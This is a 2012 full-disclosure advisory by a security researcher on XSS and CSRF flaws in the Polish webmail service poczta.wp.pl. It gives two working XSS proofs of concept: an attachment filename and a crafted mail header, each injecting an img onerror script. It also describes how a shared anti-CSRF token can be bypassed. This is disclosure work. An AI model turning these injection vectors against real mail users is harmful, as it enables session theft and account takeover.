Poczta.WP Multiple vulnerabilities full disclosure security paper
Author: Jakub Zoczek [zoczus(x)gmail.com]


0x01 Intro
----------
Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
----------
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg"
onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png

0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)
----------

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt

Result:

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg

0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;)
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used the token in a white
list form (every once in a while generated md5 of something). The
problem is, that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - token is the same...  Bypassing this protection seems to
be quite simple.

http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png

0x05 XSS in mail headers
----------

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus@fbi.pl>
Delivered-To: zoczus@wp.pl (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <zoczus@fbi.pl>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <zoczus@wp.pl>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus@wp.pl
Subject:
From: "zoczus@fbi.pl" <zoczus@fbi.pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus@fbi.pl
Reply-To: zoczus@fbi.pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807@emkei.cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]

Dobre!

Result:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png


0x06 The end. :)

----
Best regards,
Jakub Zoczek